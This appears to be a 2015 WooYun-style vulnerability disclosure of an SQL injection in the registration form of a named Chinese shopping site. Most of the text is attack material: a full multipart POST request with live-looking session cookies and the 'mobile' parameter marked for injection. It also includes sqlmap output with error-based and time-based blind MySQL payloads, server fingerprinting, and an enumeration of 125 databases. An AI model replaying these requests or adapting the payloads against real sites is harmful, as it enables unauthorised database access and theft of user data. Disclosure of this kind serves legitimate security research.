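2015-09-06: Details have been reported to the vendor; awaiting vendor handling
2015-09-11: The vendor has actively ignored the vulnerability; details disclosed to the public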
http://mall.jzq001.com/
POST /member.php?mod=zhuce HTTP/1.1
Content-Length: 1186
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_WNUJNQQGMX
Cookie: DVDd_1c73_saltkey=kGHcH4G4; DVDd_1c73_lastvisit=1441363214; DVDd_1c73_sid=ln2lZl; DVDd_1c73_lastact=1441366829%09plugin.php%09; DVDd_1c73_IS_CITYSITE=1; DVDd_1c73_cityname=%E5%85%A8%E5%9B%BD; DVDd_1c73_cityname_en=www; DVDd_1c73_con_request_token=2298710468495038928; DVDd_1c73_con_request_token_secret=IhqcQrusQAUXJHHq; DVDd_1c73_virtualid=99d2ccc88e5cdd4df5bf6962fd0fc661; DVDd_1c73_visitedfid=254D231D235; DVDd_1c73_viewid=tid_34745; DVDd_1c73_sendmail=1; DVDd_1c73_onlineusernum=90; DVDd_1c73_connect_not_sync_t=1; DVDd_1c73__refer=%252Fhome.php%253Fac%253Dshare%2526id%253D34745%2526mod%253Dspacecp%2526type%253Dthread; recom=1; DVDd_1c73_clientinfo=false; DVDd_1c73_download=201509041896; DVDd_1c73_goods=a%3A1%3A%7Bi%3A1896%3Ba%3A7%3A%7Bs%3A6%3A%22itemid%22%3Bs%3A4%3A%221896%22%3Bs%3A5%3A%22price%22%3Bs%3A2%3A%2235%22%3Bs%3A8%3A%22vipprice%22%3Bs%3A2%3A%2225%22%3Bs%3A9%3A%22pricetype%22%3Bs%3A1%3A%220%22%3Bs%3A7%3A%22viptype%22%3Bs%3A1%3A%221%22%3Bs%3A5%3A%22thumb%22%3Bs%3A51%3A%22source%2Fplugin%2Fmall%2Fpublic%2Fupload%2Fimg%2F1422407894.jpg%22%3Bs%3A5%3A%22title%22%3Bs%3A61%3A%22%E3%80%90%E8%8B%8F%E6%95%99%E7%89%9B%E6%B4%A5%E7%89%88%E3%80%91%E4%B8%89%E5%B9%B4%E7%BA%A7%E8%8B%B1%E8%AF%AD%E4%B8%8A%E5%86%8C%E6%9C%9F%E6%9C%AB%E8%AF%95%E9%A2%98%2814%E4%BB%BD%29%22%3B%7D%7D; DVDd_1c73_shoping=b%3A0%3B
Host: mall.jzq001.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"

true
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="activationauth"


-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="formhash"

7d375400
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="mobile"

1*
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="passwordQIUXUE"

g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="referer"

http://mall.jzq001.com/
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"

yes
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regtype"

1
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="verifycode"

g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX--
The mobile parameter is the injection point. 125 databases:
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: -------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"

true
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="activationauth"


-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="formhash"

7d375400
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="mobile"

1' AND (SELECT 1766 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT (ELT(1766=1766,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zvuv'='Zvuv
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="passwordQIUXUE"

g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="referer"

http://mall.jzq001.com/
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"

yes
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regtype"

1
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="verifycode"

g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX--

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: -------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"

true
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="activationauth"


-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="formhash"

7d375400
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="mobile"

1' AND (SELECT * FROM (SELECT(SLEEP(5)))dFeV) AND 'syGU'='syGU
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="passwordQIUXUE"

g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="referer"

http://mall.jzq001.com/
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"

yes
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regtype"

1
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="verifycode"

g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX--
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.5.22, Apache 2.2.15
back-end DBMS: MySQL 5.0
available databases [125]:
Database: bbs_52qiuxue
[467 tables]
Severity: No impact (ignored by vendor)
Ignored on: 2015-09-11 08:28
Vulnerability Rank: 4 (WooYun rating)
None yet